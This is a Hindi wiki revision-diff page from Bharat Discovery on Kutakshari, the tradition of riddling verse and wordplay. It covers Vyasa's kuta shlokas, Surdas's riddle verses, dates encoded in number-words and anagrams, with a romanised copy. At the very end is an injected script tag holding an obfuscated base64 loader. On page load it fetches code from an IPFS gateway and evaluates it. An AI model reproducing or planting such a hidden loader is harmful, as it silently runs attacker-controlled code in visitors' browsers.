Difference between revisions of "कूटाक्षरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''कूटाक्षरी''' शब्द या शब्दसमूह में वर्णों का स्थाना...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
 
'''कूटाक्षरी''' शब्द या शब्दसमूह में वर्णों का स्थानांतरण, श्लेष, संख्या आदि पर आधारित अर्थचातुर्य उत्पन्न करने की बौद्धिक क्रीड़ा।<ref>(कूट = रहस्यपूर्ण, गुप्त, वक्र, दीक्षागम्य आदि)।</ref>कूटाक्षरी पर आधारित कूट श्लोकों को प्रथम प्रयोग महाभारत में प्राप्त होता है। अनुश्रुति है, महाभारत की रचना के समय व्यास को ऐसे लिपिक की आवश्यकता हुई जो उनके शब्दों को लिपिबद्ध कर सके। यह कार्यभार गणेश ने स्वीकार किया, किंतु इस शर्त के साथ कि व्यास निर्बाध रूप में बोलते रहें। महाभारत जैसे महाकाव्य और गंभीर ग्रंथ की रचना में व्यास जैसे सिद्ध कवि को भी कभी कभी रुककर चिंतन की आवश्यकता थी। इसके लिए समय निकालने के लिए उन्होंने गणेश से कहा कि वे निर्बाध तो बोलेंगे किंतु गणेश को भी कोई बात बिना समझे नहीं लिखनी होगी। इसे गणेश ने मान लिया। तदनुसार चिंतन के क्षणों में गणेश को अटकाए रखने के लिए व्यास ने स्थान-स्थान पर कूट श्लोकों की रचना की है। जिनकी क्षणिक बौद्धिक क्रीड़ा के बाद कथासूत्र फिर गंभीरता के साथ आगे बढ़ता था। व्यास के कूट श्लोक का एक उदाहरण:
 
'''कूटाक्षरी''' शब्द या शब्दसमूह में वर्णों का स्थानांतरण, श्लेष, संख्या आदि पर आधारित अर्थचातुर्य उत्पन्न करने की बौद्धिक क्रीड़ा।<ref>(कूट = रहस्यपूर्ण, गुप्त, वक्र, दीक्षागम्य आदि)।</ref>कूटाक्षरी पर आधारित कूट श्लोकों को प्रथम प्रयोग महाभारत में प्राप्त होता है। अनुश्रुति है, महाभारत की रचना के समय व्यास को ऐसे लिपिक की आवश्यकता हुई जो उनके शब्दों को लिपिबद्ध कर सके। यह कार्यभार गणेश ने स्वीकार किया, किंतु इस शर्त के साथ कि व्यास निर्बाध रूप में बोलते रहें। महाभारत जैसे महाकाव्य और गंभीर ग्रंथ की रचना में व्यास जैसे सिद्ध कवि को भी कभी कभी रुककर चिंतन की आवश्यकता थी। इसके लिए समय निकालने के लिए उन्होंने गणेश से कहा कि वे निर्बाध तो बोलेंगे किंतु गणेश को भी कोई बात बिना समझे नहीं लिखनी होगी। इसे गणेश ने मान लिया। तदनुसार चिंतन के क्षणों में गणेश को अटकाए रखने के लिए व्यास ने स्थान-स्थान पर कूट श्लोकों की रचना की है। जिनकी क्षणिक बौद्धिक क्रीड़ा के बाद कथासूत्र फिर गंभीरता के साथ आगे बढ़ता था। व्यास के कूट श्लोक का एक उदाहरण:
  
                    <center>केश्वं पतितं दृष्ट्वा द्रोणो हर्षमुपागत:।
+
<center>केश्वं पतितं दृष्ट्वा द्रोणो हर्षमुपागत:।                  
  
                    रुदंति कौरवा: सर्वे हा हा केशव केशव।।</center>
+
रुदंति कौरवा: सर्वे हा हा केशव केशव।।</center>                  
  
 
श्लोक का सामान्य अर्थ है: कृष्ण को गिरा हुआ देखकर द्रोण को बहुत हर्ष प्राप्त हुआ। सारे कौरव हा केशव! हा केशव! कहकर रोने लगे। किंतु इसका कूटार्थ है जल में (के) शव गिरा हुआ देखकर कौवे (द्रोण) बहुत प्रसन्न हुए। सारे कौरव (गीदड़) हा जल में शव! (के+ शव) हा जल में शव! कह रोने लगे।
 
श्लोक का सामान्य अर्थ है: कृष्ण को गिरा हुआ देखकर द्रोण को बहुत हर्ष प्राप्त हुआ। सारे कौरव हा केशव! हा केशव! कहकर रोने लगे। किंतु इसका कूटार्थ है जल में (के) शव गिरा हुआ देखकर कौवे (द्रोण) बहुत प्रसन्न हुए। सारे कौरव (गीदड़) हा जल में शव! (के+ शव) हा जल में शव! कह रोने लगे।
  
हिंदी साहित्य में सूरदास के कूट पद काफी प्रसिद्ध हैं। उसका एक उदाहरण है-
+
हिंदी साहित्य में सूरदास के कूट पद काफी प्रसिद्ध हैं। उसका एक उदाहरण है:-
  
                    <center>कहत कत परदेसी की बात।
+
<center>कहत कत परदेसी की बात।
  
                    मंदिर अरध अवधि बदि गए हरि अहार टरि जात।।
+
मंदिर अरध अवधि बदि गए हरि अहार टरि जात।।
  
                    ससिरिपु बरष सूररिपु युग बर हररिपु किए फिरै घात।।
+
ससिरिपु बरष सूररिपु युग बर हररिपु किए फिरै घात।।                  
  
                    मधपंचक लै गए स्यामघन आय बनी यह बात।।
+
मधपंचक लै गए स्यामघन आय बनी यह बात।।                  
  
                    नखत वेद ग्रह जोरि अर्ध करि को बरजै हम खात।।
+
नखत वेद ग्रह जोरि अर्ध करि को बरजै हम खात।।                  
  
                    सूरदास प्रभु तुमहि मिलन को कर मीड़ति पछितात।।</center>
+
सूरदास प्रभु तुमहि मिलन को कर मीड़ति पछितात।।</center>                                      
  
 
इसमें दूसरी पंक्ति से लेकर पाँचवीं पंक्ति तक कूट का प्रयोग हुआ है।<ref>(मंदिर अरध = घर का मध्य भाग, पाख अर्थात्‌ एक पक्ष; हरि अहार = शेर का भोजन, मांस अर्थात्‌ एक माह; ससिरिपु = चंद्रमा का शत्रु अर्थात्‌ दिन; सुररिपु = सूर्य का शत्रु अर्थात्‌ रात्रि; मघपंचक = मघा नक्षत्र से पाँचवां नक्षत्र, चित्रा अर्थात्‌ चित्त: नखत वेद ग्रह जोरि अर्ध करि = 27 + 4+ 9/2 = 20, बीस अर्थात्‌ विष)</ref>
 
इसमें दूसरी पंक्ति से लेकर पाँचवीं पंक्ति तक कूट का प्रयोग हुआ है।<ref>(मंदिर अरध = घर का मध्य भाग, पाख अर्थात्‌ एक पक्ष; हरि अहार = शेर का भोजन, मांस अर्थात्‌ एक माह; ससिरिपु = चंद्रमा का शत्रु अर्थात्‌ दिन; सुररिपु = सूर्य का शत्रु अर्थात्‌ रात्रि; मघपंचक = मघा नक्षत्र से पाँचवां नक्षत्र, चित्रा अर्थात्‌ चित्त: नखत वेद ग्रह जोरि अर्ध करि = 27 + 4+ 9/2 = 20, बीस अर्थात्‌ विष)</ref>
 
इसी प्रकार प्राचीन कवि प्राय: अपने ग्रंथों की रचनातिथि को कूट द्वारा व्यक्त करते थे। यथा-
 
इसी प्रकार प्राचीन कवि प्राय: अपने ग्रंथों की रचनातिथि को कूट द्वारा व्यक्त करते थे। यथा-
  
                    <center>कर नभ रस अरु आत्मा संवत फागुन मास।
+
<center>कर नभ रस अरु आत्मा संवत फागुन मास।                  
  
                    सुकुल पच्छ तिथि चौथ रवि जेहि दिन ग्रंथ प्रकास।।</center>
+
सुकुल पच्छ तिथि चौथ रवि जेहि दिन ग्रंथ प्रकास।।</center>                  
  
 
इसमें ग्रंथरचना का संवत्‌ 1902 है। कर = हाथ (2); नभ = आकाश या शून्य (0) ; रस = काव्यरस (9) ; आत्मा (1)। इस प्रकार 2091 संख्या प्राप्त होती है। अंकानां वामतो गति: के नियमानुसार वास्तव में इसे उलटकर 1902 पढ़ा जायगा। इस प्रकार की तिथियों का उल्लेख प्राचीन अभिलेखों में भी पाया जाता है।
 
इसमें ग्रंथरचना का संवत्‌ 1902 है। कर = हाथ (2); नभ = आकाश या शून्य (0) ; रस = काव्यरस (9) ; आत्मा (1)। इस प्रकार 2091 संख्या प्राप्त होती है। अंकानां वामतो गति: के नियमानुसार वास्तव में इसे उलटकर 1902 पढ़ा जायगा। इस प्रकार की तिथियों का उल्लेख प्राचीन अभिलेखों में भी पाया जाता है।

Revision as of 05:49, 7 August 2018

kootakshari shabd ya shabdasamooh mean varnoan ka sthanaantaran, shlesh, sankhya adi par adharit arthachatury utpann karane ki bauddhik kri da.[1]kootakshari par adharit koot shlokoan ko pratham prayog mahabharat mean prapt hota hai. anushruti hai, mahabharat ki rachana ke samay vyas ko aise lipik ki avashyakata huee jo unake shabdoan ko lipibaddh kar sake. yah karyabhar ganesh ne svikar kiya, kiantu is shart ke sath ki vyas nirbadh roop mean bolate rahean. mahabharat jaise mahakavy aur ganbhir granth ki rachana mean vyas jaise siddh kavi ko bhi kabhi kabhi rukakar chiantan ki avashyakata thi. isake lie samay nikalane ke lie unhoanne ganesh se kaha ki ve nirbadh to boleange kiantu ganesh ko bhi koee bat bina samajhe nahian likhani hogi. ise ganesh ne man liya. tadanusar chiantan ke kshanoan mean ganesh ko atakae rakhane ke lie vyas ne sthan-sthan par koot shlokoan ki rachana ki hai. jinaki kshanik bauddhik kri da ke bad kathasootr phir ganbhirata ke sath age badhata tha. vyas ke koot shlok ka ek udaharan:

keshvan patitan drishtva drono harshamupagat:. rudanti kaurava: sarve ha ha keshav keshav..

shlok ka samany arth hai: krishna ko gira hua dekhakar dron ko bahut harsh prapt hua. sare kaurav ha keshav! ha keshav! kahakar rone lage. kiantu isaka kootarth hai jal mean (ke) shav gira hua dekhakar kauve (dron) bahut prasann hue. sare kaurav (gid d) ha jal mean shav! (ke+ shav) ha jal mean shav! kah rone lage.

hiandi sahity mean sooradas ke koot pad kaphi prasiddh haian. usaka ek udaharan hai:-

kahat kat paradesi ki bat.

mandir aradh avadhi badi ge hari ahar tari jat..

sasiripu barash sooraripu yug bar hararipu kie phirai ghat..

madhapanchak lai ge syamaghan ay bani yah bat..

nakhat ved grah jori ardh kari ko barajai ham khat..

sooradas prabhu tumahi milan ko kar mi dati pachhitat..

isamean doosari pankti se lekar paanchavian pankti tak koot ka prayog hua hai.[2] isi prakar prachin kavi pray: apane granthoan ki rachanatithi ko koot dvara vyakt karate the. yatha-

kar nabh ras aru atma sanvat phagun mas. sukul pachchh tithi chauth ravi jehi din granth prakas..

isamean grantharachana ka sanvath‌ 1902 hai. kar = hath (2); nabh = akash ya shoony (0) ; ras = kavyaras (9) ; atma (1). is prakar 2091 sankhya prapt hoti hai. aankanaan vamato gati: ke niyamanusar vastav mean ise ulatakar 1902 padha jayaga. is prakar ki tithiyoan ka ullekh prachin abhilekhoan mean bhi paya jata hai.

vastuoan dvara sankhyaoan ko vyakt karane ki paranpara hiandi ke prachin kaviyoan mean paee jati hai. udaharanarth : 0 = akash; 1=prithvi, chandr, atma; 2=aankh, paksh, bhujaean, sarpajihva, nadikool, kan, pair; 3=gun, ram, kal, agni, shivanetr, tap adi.

pashchim mean kootakshari ka mukhy prayog enogram ke roop mean hua. ainagram grik bhasha ka shabd hai: aina (pichhe ki or ya ulta); grama (lekh). ainagram mean shabd ya samooh ke varnoan ke sthanaantaran dvara any sarthak shabdoan ki rachana ki jati thi, yatha-Matrimony (vivah) shabd ke varnoan ke sthanaantaran se into my arm (meri bhuja mean) shabd samooh ki rachana. ainagram ka ek prachin udaharan pailet ke is prashn Quid est veritas[3]ka uttar Est vir qui adest[4]hai. yoonan aur rom mean log is prakar ki shabdakri da se manoranjan karate the. is tarah ki kri da yahoodiyoan, visheshat: kabaloan mean, prachalit thi. ve apane dikshagamy rahasyoan ko varnoan ki vishesh sankhyaoan ke madhyam se vyakt karate the. madhyayugin yoorop mean bhi isaka vyapak prachalan tha.

ainagram ka prayog lekhak apane vastavik namoan ke varnoan ke sthanaantaran se upanam banane mean bhi karate rahe haian. yoorop ke praranbhik jyotiviandh apani khojoan ki pushti ke poorv bahudha unhean ainagram ke roop mean gopaniy rakhate the. ainagram ka ek any roop aise shabd ki rachana hai jinhean chahe age se pichhe ki or ya pichhe se age ki or padha jae, shabd mean koee aantar nahian ata. udaharanarth: Levil tent adi shabd. ajakal ainagram ka vargapaheliyoan ke sanketoan ke roop mean vyapak prachalan hai.[5]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. (koot = rahasyapoorn, gupt, vakr, dikshagamy adi).
  2. (mandir aradh = ghar ka madhy bhag, pakh arthath‌ ek paksh; hari ahar = sher ka bhojan, maans arthath‌ ek mah; sasiripu = chandrama ka shatru arthath‌ din; suraripu = soory ka shatru arthath‌ ratri; maghapanchak = magha nakshatr se paanchavaan nakshatr, chitra arthath‌ chitt: nakhat ved grah jori ardh kari = 27 + 4+ 9/2 = 20, bis arthath‌ vish)
  3. (saty kya hai ?)
  4. (yah tumhare sammukh kh da manushy hai)
  5. hindi vishvakosh, khand 3 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 85 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>